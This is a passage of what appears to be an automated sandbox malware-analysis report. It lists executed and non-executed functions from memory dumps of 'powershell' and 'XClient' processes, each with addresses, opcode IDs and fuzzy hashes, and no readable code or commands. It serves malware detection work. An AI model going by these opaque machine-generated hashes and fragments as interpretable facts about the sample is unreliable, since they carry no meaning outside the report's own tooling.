                                                          • Instruction ID: 9cd01e74a8e4c26f1b63bfbdac3d7c209daa13965783a8cd4e0b91fcdbc3ed20
                                                          • Opcode Fuzzy Hash: 30f1cdfe22c9a1394c5a22fa797d194e06f1072b019d76192ba922380c632ef7
                                                          • Instruction Fuzzy Hash: 9BD19F70A08A4D8FDF98EF58C465AEDBBE1FF68340F15416AD44DD72A6CA34E841CB81
                                                          Function 00007FFD9B8D6605 Relevance: .4, Instructions: 436COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2190058004.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 920d20cbff2034114943c93db615cb0a902b95af9514e9d0511b41e561b184f0
                                                          • Instruction ID: 1ec883972f7900cffe415842c59c32ad6c2febf7f8d6bd49192f6859c9736d1b
                                                          • Opcode Fuzzy Hash: 920d20cbff2034114943c93db615cb0a902b95af9514e9d0511b41e561b184f0
                                                          • Instruction Fuzzy Hash: E7D13572B0FACE4FEB659B6888645B57BA0EF9A310B0903FFD45CC70E3D918A9058341
                                                          Function 00007FFD9B809D3C Relevance: .2, Instructions: 227COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8292f25ace23b671ceda36389d682096977e63a4a10c5bf6cc2db83282f3122
                                                          • Instruction ID: adcf614f7e605e320b8316c27004cd8e4d6471b44ac9dd527235ece0579019d4
                                                          • Opcode Fuzzy Hash: f8292f25ace23b671ceda36389d682096977e63a4a10c5bf6cc2db83282f3122
                                                          • Instruction Fuzzy Hash: F001A73190D6CC8FD752DB1858291E47FE0EF65240B0501EFD889CB172DA259A14C7C2
                                                          Function 00007FFD9B8D4073 Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2190058004.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ba9d733041f24442056ea0df1ff8177fc780ef98e56291868103cc2dec3e75d
                                                          • Instruction ID: 5fa0e84acaf672c6776978744def15b612549e0614b0be06932781be62b4d045
                                                          • Opcode Fuzzy Hash: 3ba9d733041f24442056ea0df1ff8177fc780ef98e56291868103cc2dec3e75d
                                                          • Instruction Fuzzy Hash: 9E510622B0EA8A4FEBA99B5C546267477D1EFD9210B1E03BFC15DC71A2DE15EC058341
                                                          Function 00007FFD9B8D4370 Relevance: .1, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2190058004.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c81920b2570818b2e2f692b4e095cc47fef458028655d72a07fa51ff2f0c6a6d
                                                          • Instruction ID: 77e74dab326f9611671a98c331723b291b1111fff94911f067ab017993d6cbe5
                                                          • Opcode Fuzzy Hash: c81920b2570818b2e2f692b4e095cc47fef458028655d72a07fa51ff2f0c6a6d
                                                          • Instruction Fuzzy Hash: E241E832B0EA494FEBA9D76C54619B477D1EFC8320B0A03BFD05DC71A7E915AD018381
                                                          Function 00007FFD9B809750 Relevance: .1, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a6e6255b8dd9fcc35cb9572b8fd8bce35f1419504d20fe1e916669a136a1abb
                                                          • Instruction ID: bbfe2027909582232df487c884c44aecfaaa9d288859184c83e1d58d2a6bf0b7
                                                          • Opcode Fuzzy Hash: 6a6e6255b8dd9fcc35cb9572b8fd8bce35f1419504d20fe1e916669a136a1abb
                                                          • Instruction Fuzzy Hash: DD410B7190DB888FDB19DF5C9C1A6A97FE0FF9A310F04416FE09993193CA64A905C7C6
                                                          Function 00007FFD9B6EED40 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2187967239.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b6ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac53450123b263562182e24ae0bbe611b12e04951128a132fe9ead8b9ee62d65
                                                          • Instruction ID: 6de94951bb8ca88544ebf611cac096fb4f2f82001eacce1eb50fea94fc83b5ec
                                                          • Opcode Fuzzy Hash: ac53450123b263562182e24ae0bbe611b12e04951128a132fe9ead8b9ee62d65
                                                          • Instruction Fuzzy Hash: AD41287040EBC44FD7A69B2898519523FF0EF57320B1A05DFD0D8CF1A3D625A846C792
                                                          Function 00007FFD9B80A64C Relevance: .1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f60e1b0da600b01f025bc3554e65f71e1dddcc47910394d4de7ad1b26ff91d01
                                                          • Instruction ID: 376193b7caa1d0992336f3d4400919fe82122ae587b11845a6c833385a636074
                                                          • Opcode Fuzzy Hash: f60e1b0da600b01f025bc3554e65f71e1dddcc47910394d4de7ad1b26ff91d01
                                                          • Instruction Fuzzy Hash: 4D21063190CB4C4FEB58DFAC984A6E97BF0EF96321F04416BD049C3152DA74A44ACB91
                                                          Function 00007FFD9B8D40BF Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2190058004.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a133d964fe891cf1c6ed96acaeea1672584ac1ff0ca4e7efb615d58fa2816e00
                                                          • Instruction ID: e26699d23c21921234b7309652c6fc71ef6082bfb2101815b3d8228cb44af292
                                                          • Opcode Fuzzy Hash: a133d964fe891cf1c6ed96acaeea1672584ac1ff0ca4e7efb615d58fa2816e00
                                                          • Instruction Fuzzy Hash: C121AE22B0FA8A4FEBB99B58446257466D1EFA8210B5E03BFD05EC75A2DE18ED058341
                                                          Function 00007FFD9B8D43BC Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2190058004.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b8d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4b016c85791bb16cb2e236c0e8167ce67441da6f494b8d75cc3b714d682fea6
                                                          • Instruction ID: f9890c7bc14b6dc8d97c64a5c20d2c409f2f77603ad278db839cf3d3513dd7fd
                                                          • Opcode Fuzzy Hash: c4b016c85791bb16cb2e236c0e8167ce67441da6f494b8d75cc3b714d682fea6
                                                          • Instruction Fuzzy Hash: AC11A032B4F5494FE7B8D75C94749B876D1EF8832074A03BBE45DC75A2DA19AD418340
                                                          Function 00007FFD9B803428 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26218db6421e67602764916d622fb61dd013f5eef063053de6ae663f4de6b7a5
                                                          • Instruction ID: e8f4e6821849368985b440244d27c258170fa57d3a4b559e436b3365ee27010e
                                                          • Opcode Fuzzy Hash: 26218db6421e67602764916d622fb61dd013f5eef063053de6ae663f4de6b7a5
                                                          • Instruction Fuzzy Hash: 1901A23260E7854FE3168B6CA8624E07FB0DF1723070942EBD0C5CB4B3D5165887C751
                                                          Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                                          Function 00007FFD9B80A2CC Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
                                                          • Instruction ID: e41858073a92c8185e7b6f52f89cc9e872a7864701fdcfd8e2caf4ec4f2f64af
                                                          • Opcode Fuzzy Hash: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
                                                          • Instruction Fuzzy Hash: 8CE04F35804A4C8FCF54EF18C8594E97BE0FF68301B0102ABE84DC7120DB719A58CBC2

                                                          Non-executed Functions

                                                          Function 00007FFD9B808BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                          • API String ID: 0-2350917820
                                                          • Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                          • Instruction ID: 0aafbbd5924e028cb88f8fb2682b7fd57e09256c17de00bbea36593f1061e17b
                                                          • Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                          • Instruction Fuzzy Hash: 6F210477B085555ACB0676BCB8559DC77A0DF9437935642F3E028CF093DD18A48B8680
                                                          Function 00007FFD9B8089F2 Relevance: 7.6, Strings: 6, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2189071272.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7ffd9b800000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                          • API String ID: 0-2891007843
                                                          • Opcode ID: 02ed07b9bd3f5f8fc0e7d9e7a72267b14756c39e77bae7ad167d90c686df58b9
                                                          • Instruction ID: ca90c6181d69b9b65698b4a398bc80e1ce68a3457a056edb8920f752141eba0c
                                                          • Opcode Fuzzy Hash: 02ed07b9bd3f5f8fc0e7d9e7a72267b14756c39e77bae7ad167d90c686df58b9
                                                          • Instruction Fuzzy Hash: 6C31B8A3B0BADA1FFBBA066948754D17BA0FF65AD870A43F6C0D48B453FC1469C34212

                                                          Executed Functions

                                                          Function 00007FFD9B7D1329 Relevance: .5, Instructions: 488COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb08fd6f56613d277ffdd38071956a29b40e1431d8724177fb083cc4eeac1933
                                                          • Instruction ID: d61454ffe16148d8c1541f1f394b46f7a8fe7e52b66d165fdfbe6c7bae8b763a
                                                          • Opcode Fuzzy Hash: bb08fd6f56613d277ffdd38071956a29b40e1431d8724177fb083cc4eeac1933
                                                          • Instruction Fuzzy Hash: BBE1A961F19A4D4FD7A8FB7894796BD77A1FFC8340B8106B9E01EC32E6DD28A9058740
                                                          Function 00007FFD9B7D04E7 Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37327bb0b7bc46277429c0455abef5ff87e275a33f28ad46b6a54313741f3a75
                                                          • Instruction ID: 54057d206c3ef376d33d34599093046f74230261a55f0b8d74a6cfd19a380f7c
                                                          • Opcode Fuzzy Hash: 37327bb0b7bc46277429c0455abef5ff87e275a33f28ad46b6a54313741f3a75
                                                          • Instruction Fuzzy Hash: 57412522B0DA490FE748EA7C94796F877D1EFC8359B0446BAE04EC72E7DD18AC468340
                                                          Function 00007FFD9B7D0C9E Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c69418fffc7557396b6a990f490b265e6490ab903a008de5d31c07235b8fe7d
                                                          • Instruction ID: 00d12776f72823527f1ebe5b843ec95b5472d81db2a3456d3d4f789ca02f7dcc
                                                          • Opcode Fuzzy Hash: 9c69418fffc7557396b6a990f490b265e6490ab903a008de5d31c07235b8fe7d
                                                          • Instruction Fuzzy Hash: 8E512821B0EB8A0FE396A73848756B93BE1DFC621474901FBD08DC71E7DC18AC468352
                                                          Function 00007FFD9B7D1942 Relevance: .2, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 159daf9b461b078522de41d052f1f71f207e4695a6bb9307cbf5fc74ce30dba9
                                                          • Instruction ID: 156725b041e1068d1aec8dd528b2464f643448bbef6bd1be44d5bba2744ef96e
                                                          • Opcode Fuzzy Hash: 159daf9b461b078522de41d052f1f71f207e4695a6bb9307cbf5fc74ce30dba9
                                                          • Instruction Fuzzy Hash: A151B12070E7C90FD7869B7888696A57FE2DF9A214B0941FBE08DCB1E7DD585C46C312
                                                          Function 00007FFD9B7D0548 Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9374eb61b9f18170629c57618d20da8091f86471377b975423fa9a62246ab98
                                                          • Instruction ID: 10b84fc92435bf8de03727cfb8f9351a4dfe738075095ae5eeacb67729a05715
                                                          • Opcode Fuzzy Hash: f9374eb61b9f18170629c57618d20da8091f86471377b975423fa9a62246ab98
                                                          • Instruction Fuzzy Hash: 0731B321B1C9490FE798EF6C84AA779B6C2EFD8345F0506BEA05EC32E7DD64AC418341
                                                          Function 00007FFD9B7D07D8 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e712f8d59526ab82be2c579530edf1bc46eb27522f69f1b3a6f5bbe054f9cd6b
                                                          • Instruction ID: fa5f1d8a317ae2902023fb9311c4595e41db438a756ea680389bb2fb02934717
                                                          • Opcode Fuzzy Hash: e712f8d59526ab82be2c579530edf1bc46eb27522f69f1b3a6f5bbe054f9cd6b
                                                          • Instruction Fuzzy Hash: BA41F36AF485DA8BD348F768F071EFC7B61AFC435479589F9D05E863CBCD2828428250
                                                          Function 00007FFD9B7D0B31 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de4e9041c32bc95cf9d2cfd107c3020254b18b02186b53c5eb880498189ab679
                                                          • Instruction ID: f804fccf0cfff9540836b249af59f72182df43a7bb8a48fe335bb9bed0469ff2
                                                          • Opcode Fuzzy Hash: de4e9041c32bc95cf9d2cfd107c3020254b18b02186b53c5eb880498189ab679
                                                          • Instruction Fuzzy Hash: 2531FF21F18A4D4FE748BBB848697BD76E1EFD8745F01427AE40DC32D7DE1868018752
                                                          Function 00007FFD9B7D09E1 Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc146244858fad23c308237b18f46f3d0728d1a062a109bfcbbdafa7a4ed1a11
                                                          • Instruction ID: 068200a8347ea2139a5811cb226c956d90742e332962773424141fbec0f6aa63
                                                          • Opcode Fuzzy Hash: cc146244858fad23c308237b18f46f3d0728d1a062a109bfcbbdafa7a4ed1a11
                                                          • Instruction Fuzzy Hash: 1F318034B18A498FDB84EB68C465AFD7BB1EFD8300F4146B9D019D3296CE386801C750
                                                          Function 00007FFD9B7D0860 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb38fa9937cbd11cbab7fc50cbaa4b80155388773ee1e0651cacaa6bd54ab7b4
                                                          • Instruction ID: 5d08f32f7355702827cdc2ab259c6d15a9a932273db976e18c001c5817abd8c1
                                                          • Opcode Fuzzy Hash: cb38fa9937cbd11cbab7fc50cbaa4b80155388773ee1e0651cacaa6bd54ab7b4
                                                          • Instruction Fuzzy Hash: DC313575B5498A8BD784FB68E0A1EFDBB71AFC4204BD149E8E41D833CEDD2869018751
                                                          Function 00007FFD9B7D1AE1 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2377155989.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5484dcb3c8b29e7f40f4c14764585662648edf7a5b6ffe9061bf9860f588ef85
                                                          • Instruction ID: 6ea694d85c601ba9736a7fd30a3da988f717e9dbaba36c37ead5795fbcb5e996
                                                          • Opcode Fuzzy Hash: 5484dcb3c8b29e7f40f4c14764585662648edf7a5b6ffe9061bf9860f588ef85
                                                          • Instruction Fuzzy Hash: 6D012811A0E7850FE351AB3858754757FE0DFD138070A06BAE488C65F3F9589A848392

                                                          Executed Functions

                                                          Function 00007FFD9B7D1329 Relevance: .5, Instructions: 488COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36733cdfe6c0e605c2e048e7ffec69cbbb59a2dc33e672bd577e024ae67536fc
                                                          • Instruction ID: ffdbd957fc8cf8aca4265eae0458332fb728a80c9f84a9f220f2fc7567160bdf
                                                          • Opcode Fuzzy Hash: 36733cdfe6c0e605c2e048e7ffec69cbbb59a2dc33e672bd577e024ae67536fc
                                                          • Instruction Fuzzy Hash: 18E1A861B19A4D4FD7A8FB7894796BD7AA1FFC8340B4106BDE01EC32E6DD28A905C740
                                                          Function 00007FFD9B7D04E7 Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50efcaa3ae9846bcef2626e29bae21ae81e947fb658cbe9bd346e4e818c69604
                                                          • Instruction ID: 8e3a4b476d27b625216461cabb6dfa341bc394b00abaf4c4bb0d4aeb23a5c801
                                                          • Opcode Fuzzy Hash: 50efcaa3ae9846bcef2626e29bae21ae81e947fb658cbe9bd346e4e818c69604
                                                          • Instruction Fuzzy Hash: C5412722B0DA490FE748EA7C94796F877D1EFC8359B0546BAE04EC72E7DD18AC468340
                                                          Function 00007FFD9B7D0C9E Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f8f213c8abb4bb863be4131a15ee1d2fe9dcd8594187c56a66e08fd8c415832
                                                          • Instruction ID: 635feb48abed5eee55663c06e2b645b9ee5638734170f7174e5cca2bca402a00
                                                          • Opcode Fuzzy Hash: 2f8f213c8abb4bb863be4131a15ee1d2fe9dcd8594187c56a66e08fd8c415832
                                                          • Instruction Fuzzy Hash: 2A510721B0EA8A0FE396A73858756B97BE1DF8625474901FBD08DC71E7DC1CAC468352
                                                          Function 00007FFD9B7D1942 Relevance: .2, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aae9de1265850902fdf380dde0820d94b437fd22f7ad85786edd49d98b53f780
                                                          • Instruction ID: 81c65cc1ca0d205eea26eef531170185699dee78b53f5723a0a2d32300b4c986
                                                          • Opcode Fuzzy Hash: aae9de1265850902fdf380dde0820d94b437fd22f7ad85786edd49d98b53f780
                                                          • Instruction Fuzzy Hash: 7651A02060E7C90FD7869B7888696A57FE2DF9A214B0941FBE08DCB1A7CD585C46C312
                                                          Function 00007FFD9B7D0548 Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ded8d2e489864d2c6ddac75ed43b9426a71c8a9aa91465b924f1a8125065483b
                                                          • Instruction ID: eb5204890259b45326495d2ae7b5643f6fec9ed21907c4595c10fedbd06e65da
                                                          • Opcode Fuzzy Hash: ded8d2e489864d2c6ddac75ed43b9426a71c8a9aa91465b924f1a8125065483b
                                                          • Instruction Fuzzy Hash: D031B321B1C9490FE798EF6C84AA779B6C2EFD8345F0506BEA05EC32E7DD64AC418341
                                                          Function 00007FFD9B7D07D8 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6377e06a672becc2b01e0f4274ebedd0658f736a3699959383a705ca521f824d
                                                          • Instruction ID: 32571b4363120e252975546d56869d28d7504426d0607b0e13a44fdd54aaf835
                                                          • Opcode Fuzzy Hash: 6377e06a672becc2b01e0f4274ebedd0658f736a3699959383a705ca521f824d
                                                          • Instruction Fuzzy Hash: 2641E22AB486DA4BD388F76CB072DFC6F61AFC4215B5589F9D05D8A3CBCD2C28468344
                                                          Function 00007FFD9B7D0B31 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
